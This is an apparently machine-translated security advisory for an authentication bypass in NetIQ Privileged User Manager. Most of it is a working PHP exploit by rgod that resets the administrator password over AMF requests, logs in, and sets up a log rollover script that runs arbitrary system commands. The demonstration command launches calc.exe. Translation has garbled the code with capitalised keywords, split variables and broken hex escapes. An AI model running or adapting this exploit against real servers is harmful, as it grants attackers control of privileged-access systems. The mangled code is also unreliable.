NetIQ Privileged User Manager password change Authentication Bypass Vulnerability

Release date:
Updated on:

Affected Systems:
Netiq Privileged User Manager
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56535

NetIQ Privileged User Manager is a solution for secure access to UNIX, Linux, and Windows systems.

The NetIQ Privileged User Manager has the Identity Authentication Bypass Vulnerability. After successful exploitation, attackers can bypass security restrictions and change the administrator password.

<* Source: rgod (rgod@autistici.org)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php
/*
Novell NetIQ Privileged User Manager 2.3.1 auth. dll pa_modify_accounts ()
Remote Code Execution Exploit

Expected output:

C: \ php> php 9sg_novell_netiq_ I .php 192.168.0.1
[*] Attacking auth. dll...
[*] Modifying admin password...
[*] Done. Proceeding to next steps.
[*] Svc_name-> somename
[*] Logging in...
[*] Logged in: succeeded
[*] Identity Token-> Token + TIzEtMLsksS92h4MlWUlySmFvQ2rx3W34xd1Fqbn5JanxGfn
Bytes
65m57viBBllf1m0C680ZrLr0zaOSn7RrbfG/vt4TuXWd1p/5E/7lx3nj8ivnbbm133
T37cPgB9EJ8058WvT2rGdJK3fJ7SqmzBSR6J8yTYat7DaiRw + 8T2md + WGbW0gGAwM4Ap95pA =
[*] Setting up a rolover script which launches calc.exe
[*] Done. The following perl script will be launched in 5 seconds:
System ("calc.exe ");

C: \ php>

Rgod
*/
Error_reporting (E_ALL ^ E_NOTICE );
Set_time_limit (0 );
$ Err [0] = "[!] This script is intended to be launched from the cli! ";
$ Err [1] = "[!] You need the curl extesion loaded! ";
If (php_sapi_name () <> "cli "){
Die ($ err [0]);
}

Function syntax (){
Print ("usage: php 9sg_novell_netiq_ I .php [ip_address] \ r \ n ");
Die ();
}

$ Argv [1]? Print ("[*] Attacking auth. dll... \ n "):
Syntax ();

If (! Extension_loaded ('curl ')){
$ Win = (strtoupper (substr (PHP_ OS, 0, 3) === 'win ')? True:
False;
If ($ win ){
! Dl ("php_curl.dll ")? Die ($ err [1]):
Print ("[*] curl loaded \ n ");
} Else {
! Dl ("php_curl.so ")? Die ($ err [1]):
Print ("[*] curl loaded \ n ");
}
}

Function _ s ($ url, $ is_post, $ ck, $ request ){
Global $ _ use_proxy, $ proxy_host, $ proxy_port;
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, $ url );
If ($ is_post ){
Curl_setopt ($ ch, CURLOPT_POST, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ request );
}
Curl_setopt ($ ch, CURLOPT_HEADER, 1 );
Curl_setopt ($ ch, CURLOPT_HTTPHEADER, array (
"Cookie:". $ ck,
"Content-Type: application/x-amf", // do not touch this, important
"X-flash-version: 11, 4, 402,278"
));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9; ENUSMSCOM )");
Curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, false );
Curl_setopt ($ ch, CURLOPT_SSL_VERIFYHOST, false );
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 15 );

If ($ _ use_proxy ){
Curl_setopt ($ ch, CURLOPT_PROXY, $ proxy_host. ":". $ proxy_port );
}
$ _ D = curl_exec ($ ch );
If (curl_errno ($ ch )){
// Die ("[!] ". Curl_error ($ ch)." \ n ");
} Else {
Curl_close ($ ch );
}
Return $ _ d;
}

/*********************************** Config *** *******************************/
$ Host = $ argv [1];
$ Port = 443;
$ Pwd = "rgod_777 _"; // by default minimum length = 8, minimum alpha = 1, minimum numeric = 1
$ Script = "system (\" calc.exe \");";
/*************************************** **************************************/

Function hex_dump ($ data, $ newline = "\ n "){
Static $ from = '';
Static $ to = '';
Static $ width = 16; static $ pad = '.';
If ($ from = ''){
For ($ I = 0; $ I <= 0xFF; $ I ++ ){
$ From. = chr ($ I );
$ To. = ($ I >= 0x20 & $ I <= 0x7E )? Chr ($ I): $ pad;
}
}
$ Hex = str_split (bin2hex ($ data), $ width * 2 );
$ Chars = str_split (strtr ($ data, $ from, $ to), $ width );
$ Offset = 0;
Foreach ($ hex as $ I =>$ line ){
Echo sprintf ('% 6x', $ offset ). ':'. implode ('', str_split ($ line, 2 )). '['. $ chars [$ I]. ']'. $ newline; $ offset + = $ width;
}
Sleep (1 );
}

Print ("[*] Modifying admin password... \ n ");

$ Data = "\ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x13 \ x53 \ x50 \ x46 \ x2e \ x55 \ x74 \ x69 \ x6c ". //........ SPF. util
"\ X2e \ x63 \ x61 \ x6c \ x6c \ x4d \ x61 \ x73 \ x74 \ x65 \ x72 \ x00 \ x04 \ x2f \ x32 \ x36 ". //. callMaster .. /26
"\ X32 \ x00 \ x00 \ x02 \ x98 \ x0a \ x00 \ x00 \ x00 \ x01 \ x03 \ x00 \ x06 \ x6d \ x65 \ x74 ". // 2 ............ met
"\ X68 \ x6f \ x64 \ x02 ".
"\ X00 \ x0e ".
"ModifyAccounts". // boom
"\ X00 \ x06 \ x6d ".
"\ X6f \ x64 \ x75 \ x6c \ x65 \ x02 \ x00 \ x04 \ x61 \ x75 \ x74 \ x68 \ x00 \ x04 \ x55 \ x73 ". // odule... auth .. us
"\ X65 \ x72 \ x03 \ x00 \ x04 \ x6e \ x61 \ x6d \ x65 \ x02 ".
"\ X00 \ x05 ".
"Admin ".
"\ X00 \ x09 \ x41 \ x43 \ x54 \ x5f \ x53 \ x55 \ x50 \ x45 \ x52 \ x03 \ x00 \ x05 \ x76 \ x61 ". //.. ACT_SUPER... va
"\ X6c \ x75 \ x65 \ x00 \ x3f \ xf0 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x06 \ x61 \ x63 ". // lue .?......... Ac
"\ X74 \ x69 \ x6f \ x6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 \ x00 \ x00 \ x09 \ x00 \ x0b \ x41 ". // tion... set ..... A
"\ X43 \ x54 \ x5f \ x43 \ x4f \ x4d \ x4d \ x45 \ x4e \ x54 \ x03 \ x00 \ x05 \ x76 \ x61 \ x6c ". // CT_COMMENT... val
"\ X75 \ x65 \ x02 \ x00 \ x04 \ x61 \ x73 \ x64 \ x64 \ x00 \ x06 \ x61 \ x63 \ x74 \ x69 \ x6f ". // ue... asdd .. actio
"\ X6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 \ x00 \ x00 \ x09 \ x00 \ x0a \ x41 \ x43 \ x54 \ x5f ". // n... set ..... ACT _
"\ X50 \ x41 \ x53 \ x53 \ x57 \ x44 \ x03 \ x00 \ x05 \ x76 \ x61 \ x6c \ x75 \ x65 \ x02 ". // PASSWD... value ..
Pack ("n", strlen ($ pwd). // 16 bit, big endian
$ Pwd.
"\ X00 \ x06 \ x61 \ x63 \ x74 \ x69 \ x6f ".
"\ X6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 \ x00 \ x00 \ x09 \ x00 \ x08 \ x41 \ x43 \ x54 \ x5f ". // n... set ..... ACT _
"\ X44 \ x45 \ x53 \ x43 \ x03 \ x00 \ x05 \ x76 \ x61 \ x6c \ x75 \ x65 \ x02 \ x00 \ x03 \ x73 ". // DESC... value... s
"\ X64 \ x73 \ x00 \ x06 \ x61 \ x63 \ x74 \ x69 \ x6f \ x6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 ". // ds .. action... set
"\ X00 \ x00 \ x09 \ x00 \ x00 \ x09 \ x00 \ x03 \ x75 \ x69 \ x64 \ x06 \ x00 \ x00 \ x09 "; //........ uid ....
$ Url = "https: // $ host: $ port /";
$ Out = _ s ($ url, 1, "_ SID _ = 1;", $ data );
// Print (hex_dump ($ out). "\ n ");
Print ("[*] Done. Proceeding to next steps. \ n ");
$ Tmp = explode ("svc", $ out); $ tmp = $ tmp [1]; $ len = unpack ("n", $ tmp [1]. $ tmp [2]);
$ Svc_name = "";
For ($ I = 0; $ I <$ len [1]; $ I ++ ){
$ Svc_name. = $ tmp [$ I + 3];
}
Echo "[*] svc_name->". $ svc_name. "\ n ";
Echo "[*] Logging in... \ n ";
$ Data =
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x15 \ x53 \ x50 \ x46 \ x2e \ x55 \ x74 \ x69 ". //......... SPF. uti
"\ X6c \ x2e \ x63 \ x61 \ x6c \ x6c \ x4d \ x6f \ x64 \ x75 \ x6c \ x65 \ x45 \ x78 \ x00 \ x02 ". // l. callModuleEx ..
"\ X2f \ x34 \ x00 \ x00 \ x00 \ x65 \ x0a \ x00 \ x00 \ x00 \ x01 \ x03 \ x00 \ x03 \ cross stone \ x6b ". /// 4... e ........ pk
"\ X74 \ x03 \ x00 \ x0b \ x43 \ x72 \ x65 \ x64 \ x65 \ x6e \ x74 \ x69 \ x61 \ x6c \ x73 \ x03 ". // t... credentials.
"\ X00 \ x04 \ x6e \ x61 \ x6d \ x65 \ x02 \ x00 \ x05 \ x61 \ x64 \ x6d \ x69 \ x6e \ x00 \ x06 ". //.. name... admin ..
"\ Cross 7 \ x61 \ x73 \ x73 \ x77 \ x64 \ x02 ".
Pack ("n", strlen ($ pwd )).
$ Pwd.
"\ X00 \ x00 \ x09 ".
"\ X00 \ x06 \ x6d \ x65 \ x74 \ x68 \ x6f \ x64 \ x02 \ x00 \ x05 \ x6c \ x6f \ x67 \ x69 \ x6e ". //.. method... login
"\ X00 \ x06 \ x6d \ x6f \ x64 \ x75 \ x6c \ x65 \ x02 \ x00 \ x04 \ x61 \ x75 \ x74 \ x68 \ x00 ". //.. module... auth.
"\ X03 \ x75 \ x69 \ x64 \ x06 \ x00 \ x00 \ x09 \ x00 \ x00 \ x09"; //. uid .......
$ Url = "https: // $ host: $ port /";
$ Out = _ s ($ url, 1, "", $ data );
// Print (hex_dump ($ out). "\ n ");
If (strpos ($ out, "successfully \ x20authenticated ")){
Echo "[*] Logged in: succeeded \ n ";
} Else {
Die ("[!] Exploit failed ");
}
$ Tmp = explode ("Identity \ x03 \ 0 \ x07content \ x02", $ out );
$ Tmp = $ tmp [1];
$ Len = unpack ("n", $ tmp [0]. $ tmp [1]);
$ Identity = "";
For ($ I = 0; $ I <$ len [1]; $ I ++ ){
$ Identity. = $ tmp [$ I + 2];
}
Echo "[*] Identity Token->". $ identity. "\ n ";
Echo "[*] Setting up a rolover script which launches calc.exe \ n ";
$ Data =
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x01 ".
"\ X00 \ x14 ".
"SPF. Util. callModuleA ".
"\ X00 \ x04 ".
"/165 ".
"\ X00 \ x00 \ x02 \ x86 \ x0a \ x00 \ x00 \ x00 \ x01 \ x03 ".
"\ X00 \ x03 ".
"Pkt ".
"\ X03 ".
"\ X00 \ x06 ".
"Method ".
"\ X02 ".
"\ X00 \ x0c ".
"SetLogConfig ".
"\ X00 \ x06 ".
"Module ".
"\ X02 ".
"\ X00 \ x07 ".
"Regclnt ".
"\ X00 \ x03 ".
"Log ".
"\ X03 ".
"\ X00 \ x04 ".
"File ".
"\ X02 ".
"\ X00 \ x09 ".
"Mylog. log ".
"\ X00 \ x05 ".
"Level ".
"\ X02 ".
"\ X00 \ x05 ".
"Trace ".
"\ X00 \ x08 ".
"Max_size ".
"\ X00 \ x40 \ x24 \ x00 ".
"\ X00 \ x00 \ x00 \ x00 \ x00 ".
"\ X00 \ x0b ".
"Min_log_lvl ".
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ".
"\ X00 \ x08 ".
"Rolover ".
"\ X02 ".
"\ X00 \ x02 ".
"S5". // repeat every 5 seconds, 1 hour = H1
"\ X00 \ x06 ".
"Script ".
"\ X03 ".
"\ X00 \ x07 ".
"Content ".
"\ X02 ".
Pack ("n", strlen ($ script) + 4 ).
$ Script.
"\ X0a \ x0a ".
"1 ;".
"\ X00 \ x00 \ x09 ".
"\ X00 \ x00 \ x09 ".
"\ X00 \ x03 ".
"Uid ".
"\ X02 ".
Pack ("n", strlen ($ identity )).
$ Identity.
"\ X00 \ x00 \ x09 ".
"\ X00 \ x08 ".
"Svc_name ".
"\ X02 ".
Pack ("n", strlen ($ svc_name )).
$ Svc_name.
"\ X00 \ x00 \ x09 ";

$ Url = "https: // $ host: $ port /";
$ Out = _ s ($ url, 1, "", $ data );
// Print (hex_dump ($ out). "\ n ");
Echo "[*] Done. The following perl script will be launched in 5 seconds: \ n". $ script. "\ n ";
?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Netiq
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Https://www.netiq.com/products/